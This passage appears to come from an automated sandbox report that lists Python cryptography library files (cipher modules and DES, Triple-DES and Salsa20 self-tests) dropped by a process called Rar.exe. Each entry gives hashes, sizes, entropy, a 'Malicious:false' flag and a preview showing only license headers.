                                                                                                                                                                                                                                  SSDEEP:384:Hrskrs9Vq732a4qBfxjXTqXPqzvGfp589zJ2FmOsI2vJfd+OjYyp9ynb1cd7l+6J:Hr6qN4ANgLmxWJ/F01aDXqx
                                                                                                                                                                                                                                  MD5:A685CF6BD22AB69D370F92B81D9C0E59
                                                                                                                                                                                                                                  SHA1:7EA6F54B4469B4B033D82BB5BFFC5659D967AA15
                                                                                                                                                                                                                                  SHA-256:A8351FB17A8A7B405D4FF76C2B596848FF5239A3E4D5E7F699240A4C96D71462
                                                                                                                                                                                                                                  SHA-512:2DA781592EA409DDBB7C15F14E29F09F58B1A304609E0F0061D086ADBB8AEB683E87E9200F7DB6B036B2ED86175FC61DED04FD2BB060541D65EE1A1752F573E6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):16472
                                                                                                                                                                                                                                  Entropy (8bit):4.9687403467675555
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:9qrskrs9t3q/IFOD7nMCWaL0CH1k9SC/D6PV3TRrFVBvGGHSrAOp:0rskrs9VqzvMCFL0CVk9SC/DKFVG
                                                                                                                                                                                                                                  MD5:01F0F6D83AB2952197EAEB8F0F83A00D
                                                                                                                                                                                                                                  SHA1:43D59454591AEB6F9DA2B8DC92E2B9BF5C4B8544
                                                                                                                                                                                                                                  SHA-256:9EA26EEBF360B5271B9A4FFB3A961CB19114903906D37FB1DEF604E25BF433EB
                                                                                                                                                                                                                                  SHA-512:0F4807944F16CD43FD0DD1EA59AD9A0B4467A0843C6FB844E50D8314C5DF5BBDF4448646479397686660062A82B632097CB2B7DFC429B3B302D140B537F04A2F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):21786
                                                                                                                                                                                                                                  Entropy (8bit):5.096707176497335
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:4qrskrs9t3q/I5KdTQUBgQXKIQ4NBtkP5QoIAfi+1+PVcC7+bKGw5EBaBg/y/xNe:Hrskrs9VqKZYPV0Nakoe8QjNV1cYtsu
                                                                                                                                                                                                                                  MD5:AE67CABCE5676ADF76D54C20328CA40E
                                                                                                                                                                                                                                  SHA1:6009537CE1C06784B2304C11D37BA964F54BB258
                                                                                                                                                                                                                                  SHA-256:4A24DAB89ED26A137BB8ED94B121623FDFE98B1E1582A1B259D8F8A4C9FEBFFE
                                                                                                                                                                                                                                  SHA-512:FE9C0CA688E90F6A6A88C10E72B07D7486D86B2F2D80DFF3D74098D6EEE7460810BD3E4737C1B7D68E9FBA621989D3ECE742E792C2EC8D8FD17831E7CA918CA9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):20845
                                                                                                                                                                                                                                  Entropy (8bit):4.919874389291741
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:0rskrs9Vqse4VTbVH31w6YKxYWQChRrYChgz9u:0r6qseObVH31hYyZgxu
                                                                                                                                                                                                                                  MD5:6C26707E9C0059E6B221CB64D91AC717
                                                                                                                                                                                                                                  SHA1:8DD876F7CF6D438EF7E6F9B1117CA0F8644E7B73
                                                                                                                                                                                                                                  SHA-256:15EC0CCBE86A0910D0416230FAC536FC59AE0A86ED59D866E6C584AE1306E23E
                                                                                                                                                                                                                                  SHA-512:8C261E8630939AE97648D93562D97FDF19B098DA22C599B96918882D38809AFF208658E7D39104C353DF521E2CA2DC9126674EF1B1901C35E19F4EE50A197915
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):31490
                                                                                                                                                                                                                                  Entropy (8bit):4.760962660094756
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:zrskrs9Vq54KdH+zQlFTMzJjecMLn6rrMPCrFC2Ogx9m2gJ444BP6xDIG76pYWsh:zr6qPHL6PMlPHYahKS2yGeVqZo
                                                                                                                                                                                                                                  MD5:75D6666A336FBAA99E486B14AEF6D176
                                                                                                                                                                                                                                  SHA1:3B11356C0D13F488C2D5F7A274D90CB27E7D3DD7
                                                                                                                                                                                                                                  SHA-256:15F3B00A1BC049C62C9E26EF3A06D91FDD800028BD4CBE2A82FA521EFCAB336E
                                                                                                                                                                                                                                  SHA-512:6606475A2DA9826A83BCED8A37F2F5F31C2B31FB13A2736565D9702B33DC660E49FFAB844E7914A3E0BD1AE790BC4D3336471CB658C6708723C713FA10DF944A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2018, Helder Eijs <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):16317
                                                                                                                                                                                                                                  Entropy (8bit):4.972164250562502
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:HwdQHvGJ6ea9UaWpN8CioAMv6WvkIy36Yc4OB:HUeGJ6DBW/9AMvdIbI
                                                                                                                                                                                                                                  MD5:99CE82AB3012C74BC91F8E8B95427E25
                                                                                                                                                                                                                                  SHA1:1B092CD7DECEF875899FE7B53B62C5533652335D
                                                                                                                                                                                                                                  SHA-256:2FF59AB811C58999DA679B0D9F25D666EBAE2FF1F1745A1044FC3DBD0E303A4F
                                                                                                                                                                                                                                  SHA-512:B69CA5C84B5DD23175EB96A498298A16A576E0806FDCDBBC05EB85217C8472453D674D06411F16625E32BBB84AB391353AF8EFED6D45C3A5E9ADE02970ADBC3D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Cipher/DES.py: Self-test for the (Single) DES cipher..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6756
                                                                                                                                                                                                                                  Entropy (8bit):5.06266598549299
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:vqwfFQHvoI13aHDjuAyiBvhvmRzhHY4loq4lo03ufufunslOi:ywdQHvJAyE87eOi
                                                                                                                                                                                                                                  MD5:23C5203726EDB0F1187847B33A8100E4
                                                                                                                                                                                                                                  SHA1:CE17C2044B3C699B97758EA1F3B2865A30F4EF2A
                                                                                                                                                                                                                                  SHA-256:1B98BD98C3D586FF6C16A0C281C5E16AE56F6E6B1D2742CB82D071CF6F54AFAA
                                                                                                                                                                                                                                  SHA-512:A589F23C35E9B0B1FCCC0D04247213018A2F6BB0F4D21303833ACDA41FC148BF884E20BCF882F0547FE99EE7F2079BA89EF7298FE822F0262E5D924072C1179E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Cipher/DES3.py: Self-test for the Triple-DES cipher..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):29594
                                                                                                                                                                                                                                  Entropy (8bit):4.957692526089376
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:Hrskrs9VqihhfkZA0feFGMQcne3MKLLr9B6ES4HCkh9uVg1444W06mD3GL6ppWXP:Hr6qEk/vtS4VyOk2VX3DX
                                                                                                                                                                                                                                  MD5:3D9F3EE8F186BE39CD8BD11A32546DB9
                                                                                                                                                                                                                                  SHA1:B925778DB3FDED551EAB7C8D2BDC70566E1A8FF5
                                                                                                                                                                                                                                  SHA-256:DBC39CEA208C0A3D8963C29360393E485FEDB9A8F66C0A9CAD285014C96FDF58
                                                                                                                                                                                                                                  SHA-512:38630AF0D2242F8425375F6E87FE5C1F81BF71FC74F2EF8CC6BF245E4B3E61D47D9A260960C2303B87740424E330DDB27858B4670E07944C3F615C92B700643A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):38227
                                                                                                                                                                                                                                  Entropy (8bit):4.989191313246231
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:Hrskrs9VqvamL+F78Lz12BKOsc2zJjd+6neiVzoHG7hi6oaaaNH8z5kwIgX8As3N:Hr6qRLLRWiV0/vC9Q7pTmYXoX3h
                                                                                                                                                                                                                                  MD5:63DEBE7801411BF7CE24C24D875307ED
                                                                                                                                                                                                                                  SHA1:DC67FA052453B85A8A6B1E7C4DA386F821534E13
                                                                                                                                                                                                                                  SHA-256:FBD00F487173D330C461DC53F14CB971BDC708630515BF343864F83A7DD98C1A
                                                                                                                                                                                                                                  SHA-512:B98888E159F2E530A90C07D0146FC95019B667C1C8B1836FFCD66F2D403D65D26143E171FE5F822113FC3508D0BC1A108D49C9F79D14A036685E921FEE6BF0A7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):33484
                                                                                                                                                                                                                                  Entropy (8bit):4.976278818343072
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:0r6q/tlygjylMmWp3r3Cdx3fznY89OWdtKjdw:0rp/SgjCMp3r3Cd57Y897dtKjdw
                                                                                                                                                                                                                                  MD5:3CB37B2EE0C4CF45377BEB9DA08640F7
                                                                                                                                                                                                                                  SHA1:2723FA871E7A5FAA48B95344D262EC8181B26D99
                                                                                                                                                                                                                                  SHA-256:05D877E5930EE6784FD584014DC9F96F5022B788B18902907CF8283153FA252D
                                                                                                                                                                                                                                  SHA-512:D7CE67901EE4DC0374EE449D2E0F97D2A6BC8B3E3A7042AE914E6F631D6CF136E5C5CEFC627C42514EB6F6BDED066BB777080019036D38EF2BB0B62DED88AB5F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9605
                                                                                                                                                                                                                                  Entropy (8bit):5.31125213354927
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:M7DqrYJALrYJHdt3EHGuI4EsHg/pwJBcgIUOU9F3T6D+iDH978H3WpP9foEQTHSM:4qrskrs9t3q/IOOe3T6DF55xm+MQOp
                                                                                                                                                                                                                                  MD5:69D45753BA108E314F2EC3139D23F1AB
                                                                                                                                                                                                                                  SHA1:F4A946A36A10D898F0363CB435E5E2D5B3A82AA3
                                                                                                                                                                                                                                  SHA-256:D6E8220E8F383C767A2EAC33A812B5B63962A7BAE8ED083C72EA32EB39440BC2
                                                                                                                                                                                                                                  SHA-512:5D00264AB5B0CB21D1BB75FB5A046D545EB58EDE1B7C1E251A1D023BE2F6DBBDFCF9B8557DAB0DFD5704B876E1E96B34F97D1BD1A5224598761088114191D1AB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8695
                                                                                                                                                                                                                                  Entropy (8bit):5.233149864619367
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:4qrskrs9t3q/I9mdYbJgNZN1U+KrYK4EZjpcURPSxI3JWcJj7cBEsOp:Hrskrs9VqbdYbJgNZN1U+KrYK4EZjpcE
                                                                                                                                                                                                                                  MD5:F0B2D0E39D7957BD5486A415E9979E34
                                                                                                                                                                                                                                  SHA1:36FD6B0A542857E099084680148FFC5732F3246B
                                                                                                                                                                                                                                  SHA-256:4AB75E51F66DD9C80B9B893C7EB35EEE23D93E14A6368099337987E3692D1B2B
                                                                                                                                                                                                                                  SHA-512:30414BECFFD622EA003C416A865CC5CEDA0BEB8C28462D1499D170818E4B91AF5E42377CBECE3D344920632CB250502B6E1921833D263805AB7FACED31774150
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):20491
                                                                                                                                                                                                                                  Entropy (8bit):5.006612959191385
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:Hrskrs9VqVTh5VGxNepuQTs5Tv/NoEeLi4WCImQhpHHa7DZhptMa+HRReeo8he/O:Hr6qCUDEUlJI1J4s
                                                                                                                                                                                                                                  MD5:24B5612D20DECB36BBA91195B3D38B6C
                                                                                                                                                                                                                                  SHA1:AFC72B63DF008E0175F1A3DBDBCABAE4A9AC4323
                                                                                                                                                                                                                                  SHA-256:AC2B287F231294E23E8037A25773BD7A67A54A72AB1FD6FD4D2652244E985D9A
                                                                                                                                                                                                                                  SHA-512:7989BAB6E0A17F65895E8E8966FBE9997B53DD07820E9FE3DF79C6D618E03CF9B296F46387949904F00A65FDA6292D8F59F84B1680840E069415F004521FC0BC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):16958
                                                                                                                                                                                                                                  Entropy (8bit):5.160995992543063
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:EQHvhR8hott4ZbmisW8uIeXpF+yca4etqp809eGTEQ4Mn+RBHTe/rjkbTwELKQHJ:EehuhQQsvusyv4etPaT5+WkbTxejsf
                                                                                                                                                                                                                                  MD5:20A190205D607A6AA44E8DC20A17310C
                                                                                                                                                                                                                                  SHA1:265351009BC9D8E1E39EB5F62F0A52C7B560BBB0
                                                                                                                                                                                                                                  SHA-256:F99CC569B39F3163A2025A128A4323E3454BC32473624627920287EC0DBB667E
                                                                                                                                                                                                                                  SHA-512:E8092EAC3CAB508AED453204CAA382B5FAD940425DE158106E0F738101A5E1C5326CE3402D3090E932C3DB156355DA61CEB3B7E52B358B8AF42FD5BE7C26006E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Cipher/Salsa20.py: Self-test for the Salsa20 stream cipher..#..# Written in 2013 by Fabrizio Tarizzo <fabrizio@fabriziotarizzo.org>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11227
                                                                                                                                                                                                                                  Entropy (8bit):4.882703342503383
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:JQHv4y5ktlkZr+K2XLEGTOqZoS/O/M+pOS:JeVGmpOgGiq+S27F
                                                                                                                                                                                                                                  MD5:7B5B7AFA67531ACD4B7753B49FCE8CAB
                                                                                                                                                                                                                                  SHA1:1D6933BB1C12E3140C30BA4C4B7E5A10BA687900
                                                                                                                                                                                                                                  SHA-256:A33F4341D43D86CE8F8C87F2BCCC5DE1300CA223E2A53279B20348886C17F0C7
                                                                                                                                                                                                                                  SHA-512:15EE4D1DDBC6AF819FE33602CCF7E31DA34F15B7CF580DE0AEBF925511477D39D01C003FA2B630360FFBC724855EC555942311A6A08829E3A6581B0557EFBAE9
                                                                                                                                                                                                                                  Malicious:false
